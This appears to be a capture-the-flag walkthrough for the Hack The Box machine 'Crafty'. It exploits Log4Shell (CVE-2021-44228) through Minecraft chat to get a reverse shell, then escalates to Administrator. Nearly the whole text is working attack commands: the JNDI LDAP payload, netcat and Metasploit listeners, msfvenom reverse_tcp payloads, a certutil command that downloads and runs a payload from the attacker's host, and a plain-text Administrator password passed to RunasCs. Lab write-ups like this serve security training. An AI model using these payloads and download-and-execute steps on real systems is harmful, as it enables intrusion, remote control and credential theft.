nmap 10.10.11.249 -p-
sudo nmap -p80,25565 -sV -sC 10.10.11.249
I add crafty to /etc/hosts
with the corresponding ip address given. Then navigate to http://crafty.htb
echo "10.10.11.249 crafty.htb" | sudo tee -a /etc/hosts
When I visited crafty.htb
, I found a Minecraft introduction page.
However, for port 25565
, I recall there being a log4j vulnerability, CVE-2021–44228
to be precise. This exploit enables control over log messages and parameters to execute arbitrary code. An exploit for this vulnerability can be found here.
git clone https://github.com/kozmer/log4j-shell-poc
Modify the String cmd
variable to ensure compatibility with Windows.
In order for poc.py
to run smoothly we need a java archive to be named jdk1.8.0_20
. I found a java archive here
wget https://repo.huaweicloud.com/java/jdk/8u181-b13/jdk-8u181-linux-x64.tar.gz
tar -xf jdk-8u181-linux-x64.tar.gz
mv jdk1.8.0_181 jdk1.8.0_20
To connect to the server, I needed to download the Minecraft client on my Kali system. After conducting some research, I downloaded TLauncher. https://tlauncher.org/en/download_1/minecraft-1-16-5_12582.html (I don’t recommend using this, but I proceeded anyway since I’m installing it on a VM.) And I used Minecraft 1.16.5 Java Edition as I knew it’s vulnerable to log4j.
one download the TLauncher.zip file, unzip it and open it by runing below command:
sudo java -jar TLauncher.jar
after that select the correct release version and fill the minecraft account name, then procced on Enter the game
.
Clicking on Multiplayer
allowed me to enter the server.
10.10.11.249:25565
I had to attempt logging in to the server multiple times, and each time I had to reset the box for it to function properly. Once I login to the server, I opened a terminal and ran the POC. and it will show a command (${jndi:ldap://10.10.16.18:1389/a}
) I copied that.
python3 poc.py --userip <tun0 IP> --webport 80 --lport 4444
and open another terminal and create a netcat listener on port 4444
nc -nlvp 4444
then in minecraft, I press t
(to send a message) and in the chat box i paste that copied command (${jndi:ldap://10.10.16.18:1389/a}
), so in few second i got the reverse shell in my netcat listener.
in below screenshot you can see the whole process:
So now we can obtain the user.txt
While exploring the machine, I stumbled upon an interesting .jar file located in C:\Users\svc_minecraft\server\plugins
.
With my current shell I can’t download the file so I followed blow steps:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.16.18 LPORT=4244 -f exe -o exploit.exe
I then fired up Metasploit and did the following:
sudo msfconsole -q
use multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 10.10.16.18
set lport 4244
run
then spin up a python server on a separate tab to deliver exploit.exe
.
python3 -m http.server 4245
Then run below command in the on the foothold shell. This command will grab the msfvenom exploit.exe
and put it on the target machine.
certutil -urlcache -f http://10.10.16.18:4245/exploit.exe %temp%/exploit.exe
Then run the exploit.exe
.
start %temp%/exploit.exe
BOOM! We got a stable shell through meterpreter. so now we can download the jar file.
If we want to find out what is in this file we need a Java Decompiler. The command for one is jd-gui
and it is built into kali. This will open up a the decompiler for you. Click on File
in the top right and click Open File
. Find the .jar file and open it up.
sudo apt install jd-gui
By opening this file with JD-GUI, I found a credential in the Playercounter.class
.
Now We are going to use RunasCs
which will allow us to run processes with different permissions that the ones we currently have. The goal is to initiate an Administrator shell from our current user svc_minecraft
.
https://github.com/antonioCoco/RunasCs/releases
Download the version 1.5 RunasCs.zip
from the embed above and run an unzip on it. We are going to be using the RunasCs.exe
for this box.
Now create another msfvenom payload but for another port 4246
.
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.16.18 LPORT=4246 -f exe -o exploit2.exe
On the meterpreter session you can try uploading to \server\plugins
but it won’t work because of permissions. We need to make our way over to \server\logs
so we can upload the new payload exploit2.exe
and RunasCs.exe
.
Open a new tab and launch Metasploit by typing msfconsole
. Repeat the procedure from the previous Metasploit segment, this time configuring it to operate on port 4246. (listener)
sudo msfconsole -q
use multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 10.10.16.18
set lport 4246
run
Returning to our previous Meterpreter shell, execute the following commands:
.\RunasCs.exe Administrator s67u84zKq8IXw exploit2.exe
BOOM!! We got the Administrator shell. as well as root flag !!!